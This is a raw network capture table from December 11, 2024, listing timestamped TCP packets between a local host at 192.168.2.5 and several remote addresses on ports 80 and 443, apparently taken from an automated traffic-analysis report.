                                                                                                                                                                            Dec 11, 2024 09:40:01.413551092 CET49878443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:01.413566113 CET44349878151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.413897038 CET44349878151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.413957119 CET49878443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:01.724711895 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.725131989 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.725291967 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.725363016 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.725375891 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:01.725390911 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.725404024 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.725418091 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:01.725445032 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:01.739778996 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.739870071 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:01.739906073 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.740551949 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:01.742232084 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.744752884 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:01.750678062 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.752588034 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:01.752614975 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.755028009 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:01.844341993 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.844433069 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:01.844464064 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.844551086 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:01.955859900 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.955874920 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.955912113 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.955977917 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:01.955996990 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:01.956011057 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:01.956044912 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.002948046 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.002969980 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.003065109 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.003098011 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.003113985 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.003133059 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.127952099 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.127979994 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.128129959 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.128160954 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.128631115 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.151015997 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.151062012 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.151098967 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.151114941 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.151137114 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.151151896 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.173759937 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.173789978 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.173844099 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.173870087 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.173902035 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.173908949 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.200181961 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.200211048 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.200299978 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.200330019 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.200803041 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.314421892 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.314449072 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.314507961 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.314527035 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.314538956 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.314584017 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.331053972 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.331080914 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.331127882 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.331139088 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.331175089 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.331188917 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.336208105 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.336293936 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.336297989 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.336344004 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.336560011 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.336574078 CET44349879151.101.1.108192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.336599112 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.336618900 CET49879443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:40:02.370121002 CET8049769185.106.176.204192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:02.370245934 CET4976980192.168.2.5185.106.176.204
                                                                                                                                                                            Dec 11, 2024 09:40:02.371817112 CET4976980192.168.2.5185.106.176.204
                                                                                                                                                                            Dec 11, 2024 09:40:02.491204023 CET8049769185.106.176.204192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:06.851463079 CET44349836172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:06.851536036 CET44349836172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:06.851710081 CET49836443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:06.852374077 CET44349837172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:06.852437019 CET44349837172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:06.852509022 CET49837443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:07.861748934 CET4992780192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:07.980931997 CET80499273.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:07.981023073 CET4992780192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:07.995930910 CET4992780192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:08.115190029 CET80499273.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:08.988527060 CET49836443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:08.988555908 CET44349836172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:08.988955021 CET49837443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:08.988986969 CET44349837172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:09.077990055 CET80499273.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:09.078012943 CET80499273.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:09.078114033 CET4992780192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:09.505439043 CET4992780192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:10.513761997 CET4993480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:10.633078098 CET80499343.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:10.633178949 CET4993480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:10.659851074 CET4993480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:10.780028105 CET80499343.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:11.728720903 CET80499343.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:11.728840113 CET80499343.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:11.732637882 CET4993480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:12.165033102 CET4993480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:13.178750038 CET4994480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:13.298065901 CET80499443.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:13.298626900 CET4994480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:13.312793970 CET4994480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:13.434834003 CET80499443.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:13.434848070 CET80499443.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:14.395376921 CET80499443.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:14.395546913 CET80499443.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:14.395620108 CET4994480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:14.816540003 CET4994480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:15.821660042 CET4995380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:15.941756964 CET80499533.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:15.941914082 CET4995380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:15.951203108 CET4995380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:16.070686102 CET80499533.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:17.046646118 CET80499533.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:17.046786070 CET80499533.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:17.046952009 CET4995380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:17.049673080 CET4995380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:17.168921947 CET80499533.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:24.234639883 CET4434984818.165.220.110192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:24.234723091 CET4434984818.165.220.110192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:24.234925032 CET49848443192.168.2.518.165.220.110
                                                                                                                                                                            Dec 11, 2024 09:40:30.951915026 CET4998980192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:31.072854042 CET80499895.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:31.073023081 CET4998980192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:31.085997105 CET4998980192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:31.205337048 CET80499895.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:32.321997881 CET80499895.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:32.322082996 CET80499895.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:32.322160006 CET4998980192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:32.597361088 CET4998980192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:33.605170012 CET4999580192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:33.725264072 CET80499955.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:33.725374937 CET4999580192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:33.741982937 CET4999580192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:33.863671064 CET80499955.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:34.968708992 CET80499955.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:34.969269991 CET80499955.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:34.969331026 CET4999580192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:35.254359007 CET4999580192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:36.260869980 CET5000180192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:36.381314993 CET80500015.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:36.381413937 CET5000180192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:36.396080017 CET5000180192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:36.515567064 CET80500015.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:36.515600920 CET80500015.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:37.656652927 CET80500015.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:37.656666040 CET80500015.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:37.656730890 CET5000180192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:37.909868956 CET5000180192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:38.930308104 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:39.050000906 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:39.050080061 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:39.061841965 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:39.181221008 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.345693111 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.345740080 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.345753908 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.345915079 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.345957994 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.345973969 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.345988989 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.346019030 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.346148968 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.346280098 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.346295118 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.346311092 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.346323013 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.346354008 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.346486092 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.465579987 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.465657949 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.465944052 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.469698906 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.537938118 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.537966967 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.538247108 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.542068958 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.542151928 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.542418957 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.550359011 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.550453901 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.552967072 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.559469938 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.559497118 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.564791918 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.567143917 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.567331076 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.567486048 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.575551987 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.575618029 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.578900099 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.583949089 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.583980083 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.586673975 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.592205048 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.592446089 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.592597961 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.600651026 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.600691080 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.600869894 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.609045982 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.609082937 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.611526966 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.657769918 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.657882929 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.658090115 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.661989927 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.662012100 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.664628029 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.732517004 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.732604027 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.732911110 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.735004902 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.735088110 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.736687899 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.739860058 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.740578890 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.740684986 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.744754076 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.744786024 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.746845007 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.749643087 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.749739885 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.754542112 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.754576921 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.754585028 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.757273912 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.759356976 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.759557962 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.762829065 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.764182091 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.764199972 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.764800072 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.769323111 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.769547939 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.770824909 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.773900986 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.774107933 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.774687052 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.778780937 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.778947115 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.780073881 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.783649921 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.783721924 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.785579920 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.788475037 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.788513899 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.788691044 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.792646885 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.792715073 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.792884111 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.796516895 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.796616077 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.796750069 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.800352097 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.800487995 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.800797939 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.804267883 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.804833889 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.805078030 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.808121920 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.808706999 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.808865070 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.811898947 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.812083960 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.812860012 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.815742016 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.815936089 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.816350937 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.819618940 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.819663048 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.819868088 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.823457956 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.924527884 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.924781084 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.924784899 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.925371885 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.925693035 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.925710917 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.929878950 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.929897070 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.930474997 CET5000780192.168.2.55.39.10.93
